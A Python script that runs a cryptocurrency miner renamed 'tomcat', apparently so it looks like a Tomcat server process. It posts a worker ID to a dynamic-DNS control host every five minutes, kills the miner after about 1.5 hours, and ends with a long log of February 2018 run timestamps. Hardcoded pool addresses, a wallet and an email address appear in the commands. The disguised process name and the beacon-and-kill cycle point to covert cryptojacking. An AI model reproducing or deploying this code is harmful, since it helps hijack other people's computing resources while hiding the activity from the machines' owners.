import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:47:01.830589
#2018-02-17 16:36:06.061481
#2018-02-17 18:24:04.847155
#2018-02-17 20:12:06.998452
#2018-02-17 21:59:07.568948
#2018-02-17 23:44:01.545475
#2018-02-18 01:34:05.165751
#2018-02-18 03:19:06.639173
#2018-02-18 05:08:05.988919
#2018-02-18 07:00:09.478823
#2018-02-18 08:49:06.954599
#2018-02-18 10:36:05.427806
#2018-02-18 12:20:07.859272
#2018-02-18 14:07:04.171660
#2018-02-18 15:57:04.129608
#2018-02-18 17:47:01.632660
#2018-02-18 19:33:07.822049
#2018-02-18 21:18:04.416289
#2018-02-18 23:06:06.369083
#2018-02-19 00:53:05.888042
#2018-02-19 02:40:08.487072
#2018-02-19 04:28:06.469936
#2018-02-19 06:12:07.661225
#2018-02-19 08:01:06.720617
#2018-02-19 09:51:08.666784
#2018-02-19 11:40:08.075172
#2018-02-19 13:28:05.455719
#2018-02-19 15:18:02.083659
#2018-02-19 17:06:05.288425
#2018-02-19 18:54:01.936093
#2018-02-19 20:32:05.583170
#2018-02-19 22:20:02.794629
#2018-02-20 00:05:06.562451
#2018-02-20 01:51:03.670048
#2018-02-20 03:41:01.831866
#2018-02-20 05:26:05.416502
#2018-02-20 07:10:05.074923
#2018-02-20 08:55:07.097399
#2018-02-20 10:39:05.522060
#2018-02-20 12:25:08.031341
#2018-02-20 14:11:06.277572
#2018-02-20 15:54:04.891543
#2018-02-20 17:41:07.184508
#2018-02-20 19:31:06.129223
#2018-02-20 21:19:04.253087
#2018-02-20 23:04:04.355539
#2018-02-21 00:46:04.743168
#2018-02-21 02:31:02.260466
#2018-02-21 04:18:06.404855
#2018-02-21 06:06:07.488572
#2018-02-21 07:53:04.904162
#2018-02-21 09:38:05.179178
#2018-02-21 11:26:07.241846
#2018-02-21 13:15:08.046668
#2018-02-21 15:00:14.162232
#2018-02-21 16:51:01.641079
#2018-02-21 18:40:11.754703
#2018-02-21 20:25:08.852017
#2018-02-21 22:13:07.364651
#2018-02-22 00:04:05.123588
#2018-02-22 01:52:05.645002
#2018-02-22 03:39:03.556650
#2018-02-22 05:26:01.257284
#2018-02-22 07:11:01.411576
#2018-02-22 08:57:06.928427
#2018-02-22 10:44:08.000728
#2018-02-22 12:32:04.738274
#2018-02-22 14:17:01.529039
#2018-02-22 16:04:07.875975
#2018-02-22 17:51:10.138191
#2018-02-22 19:39:06.998232
#2018-02-22 21:31:06.458015
#2018-02-22 23:18:01.949160
#2018-02-23 01:03:07.334002
#2018-02-23 02:50:01.811362
#2018-02-23 04:38:04.034427
#2018-02-23 06:24:07.434922
#2018-02-23 08:11:01.677740
#2018-02-23 10:28:03.449960
#2018-02-23 12:21:01.995853
#2018-02-23 14:09:06.969763
#2018-02-23 16:01:01.922310
#2018-02-23 17:46:11.648913
#2018-02-23 19:34:06.019827
#2018-02-23 21:16:08.409331
#2018-02-23 23:05:07.297625
#2018-02-24 00:55:08.331673
#2018-02-24 02:50:04.821588
#2018-02-24 04:40:07.682024
#2018-02-24 06:24:06.850906
#2018-02-24 08:12:04.335781
#2018-02-24 09:56:06.895840
#2018-02-24 11:51:07.358815
#2018-02-24 13:43:03.791465
#2018-02-24 15:34:03.676377
#2018-02-24 17:29:06.952297
#2018-02-24 19:16:01.372130
#2018-02-24 21:03:01.290654
#2018-02-24 23:37:01.440927
#2018-02-25 02:58:01.261638
#2018-02-25 06:55:02.087090